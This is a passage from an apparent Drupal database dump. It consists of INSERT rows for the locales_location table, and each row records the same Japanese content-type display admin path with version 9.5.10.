(2410, 2166, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2411, 2167, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2412, 2168, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2413, 2169, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2414, 2170, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2415, 2171, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2416, 2172, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2417, 2173, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2418, 2174, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2419, 2175, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2420, 2176, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2421, 2177, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2422, 2178, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2423, 2179, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2424, 2180, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2425, 2181, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2426, 2182, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2427, 2183, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2428, 2184, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2429, 2185, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2430, 2186, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2431, 2187, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2432, 2188, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2433, 2189, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2434, 2190, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2435, 2191, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2436, 2192, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2437, 2193, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2438, 2194, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2439, 2195, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2440, 2196, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2441, 2197, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2442, 2198, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2443, 2199, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2444, 2200, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2445, 2201, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2446, 2202, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2447, 2203, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2448, 2204, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2449, 2205, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2450, 2206, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2451, 2207, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2452, 2208, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2453, 2209, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2454, 2210, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2455, 2211, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2456, 2212, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2457, 2213, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2458, 2214, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2459, 2215, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2460, 2216, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2461, 2217, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2462, 2218, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2463, 2219, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2464, 2220, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2465, 2221, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2466, 2222, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2467, 2223, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2468, 2224, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2469, 2225, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2470, 2226, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2471, 2227, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2472, 2228, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2473, 2229, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2474, 2230, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2475, 2231, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2476, 2232, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2477, 2233, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2478, 2234, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2479, 2235, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2480, 2236, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2481, 2237, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2482, 2238, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2483, 2239, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2484, 2240, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2485, 2241, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2486, 2242, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2487, 2243, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2488, 2244, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2489, 2245, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2490, 2246, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2491, 2247, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2492, 2248, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2493, 2249, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2494, 2250, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2495, 2251, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2496, 2252, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2497, 2253, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2498, 2254, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2499, 2255, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2500, 2256, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2501, 2257, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2502, 2258, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2503, 2259, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2504, 2260, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2505, 2261, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2506, 2262, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2507, 2263, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2508, 2264, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2509, 2265, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2510, 2266, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2511, 2267, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2512, 2268, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2513, 2269, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2514, 2270, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2515, 2271, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2516, 2272, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2517, 2273, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2518, 2274, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2519, 2275, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2520, 2276, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2521, 2277, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2522, 2278, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2523, 2279, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2524, 2280, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2525, 2281, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2526, 2282, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2527, 2283, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2528, 2284, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2529, 2285, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2530, 2286, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2531, 2287, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2532, 2288, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2533, 2289, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2534, 2290, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2535, 2291, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2536, 2292, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2537, 2293, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2538, 2294, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2539, 2295, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2540, 2296, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2541, 2297, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2542, 2298, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2543, 2299, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2544, 2300, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2545, 2301, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2546, 2302, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2547, 2303, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2548, 2304, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2549, 2305, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2550, 2306, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2551, 2307, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2552, 2308, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2553, 2309, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2554, 2310, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2555, 2311, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2556, 2312, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2557, 2313, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2558, 2314, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2559, 2315, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2560, 2316, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2561, 2317, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2562, 2318, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2563, 2319, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2564, 2320, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2565, 2321, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2566, 2322, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2567, 2323, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2568, 2324, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2569, 2325, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2570, 2326, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2571, 2327, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2572, 2328, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2573, 2329, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2574, 2330, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2575, 2331, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2576, 2332, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2577, 2333, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2578, 2334, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2579, 2335, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2580, 2336, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2581, 2337, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2582, 2338, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2583, 2339, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2584, 2340, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2585, 2341, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2586, 2342, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2587, 2343, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2588, 2344, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2589, 2345, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2590, 2346, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2591, 2347, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2592, 2348, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2593, 2349, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2594, 2350, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2595, 2351, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2596, 2352, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2597, 2353, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2598, 2354, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2599, 2355, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2600, 2356, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2601, 2357, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2602, 2358, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2603, 2359, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2604, 2360, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2605, 2361, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2606, 2362, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2607, 2363, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2608, 2364, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2609, 2365, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2610, 2366, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2611, 2367, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2612, 2368, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2613, 2369, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2614, 2370, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2615, 2371, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2616, 2372, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2617, 2373, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2618, 2374, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2619, 2375, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2620, 2376, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2621, 2377, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2622, 2378, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2623, 2379, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2624, 2380, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2625, 2381, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2626, 2382, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2627, 2383, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2628, 2384, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2629, 2385, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2630, 2386, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2631, 2387, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2632, 2388, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2633, 2389, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2634, 2390, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2635, 2391, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2636, 2392, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2637, 2393, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2638, 2394, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2639, 2395, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2640, 2396, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2641, 2397, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2642, 2398, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2643, 2399, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2644, 2400, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2645, 2401, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2646, 2402, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2647, 2403, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2648, 2404, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2649, 2405, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2650, 2406, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2651, 2407, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2652, 2408, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2653, 2409, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2654, 2410, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2655, 2411, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2656, 2412, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2657, 2413, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2658, 2414, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2659, 2415, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2660, 2416, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2661, 2417, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2662, 2418, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2663, 2419, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2664, 2420, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2665, 2421, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2666, 2422, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2667, 2423, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2668, 2424, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2669, 2425, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2670, 2426, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2671, 2427, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2672, 2428, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2673, 2429, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2674, 2430, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2675, 2431, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2676, 2432, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2677, 2433, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2678, 2434, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2679, 2435, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2680, 2436, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2681, 2437, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2682, 2438, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2683, 2439, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2684, 2440, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2685, 2441, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2686, 2442, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2687, 2443, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2688, 2444, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2689, 2445, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2690, 2446, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2691, 2447, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2692, 2448, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2693, 2449, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2694, 2450, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2695, 2451, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2696, 2452, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2697, 2453, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2698, 2454, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2699, 2455, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2700, 2456, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2701, 2457, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2702, 2458, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2703, 2459, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2704, 2460, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10');
INSERT INTO `locales_location` (`lid`, `sid`, `type`, `name`, `version`) VALUES
(2705, 2461, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2706, 2462, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2707, 2463, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2708, 2464, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2709, 2465, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2710, 2466, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2711, 2467, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2712, 2468, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2713, 2469, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2714, 2470, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2715, 2471, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2716, 2472, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2717, 2473, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2718, 2474, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2719, 2475, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2720, 2476, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2721, 2477, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2722, 2478, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2723, 2479, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2724, 2480, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2725, 2481, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2726, 2482, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2727, 2483, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2728, 2484, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2729, 2485, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2730, 2486, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2731, 2487, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2732, 2488, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2733, 2489, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2734, 2490, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2735, 2491, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2736, 2492, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2737, 2493, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2738, 2494, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2739, 2495, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2740, 2496, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2741, 2497, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2742, 2498, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2743, 2499, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2744, 2500, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2745, 2501, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2746, 2502, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2747, 2503, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2748, 2504, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2749, 2505, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2750, 2506, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2751, 2507, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2752, 2508, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2753, 2509, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2754, 2510, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2755, 2511, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2756, 2512, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2757, 2513, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2758, 2514, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2759, 2515, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2760, 2516, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2761, 2517, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2762, 2518, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2763, 2519, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2764, 2520, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
(2765, 2521, 'path', '/ja/admin/structure/types/manage/activities/display', '9.5.10'),
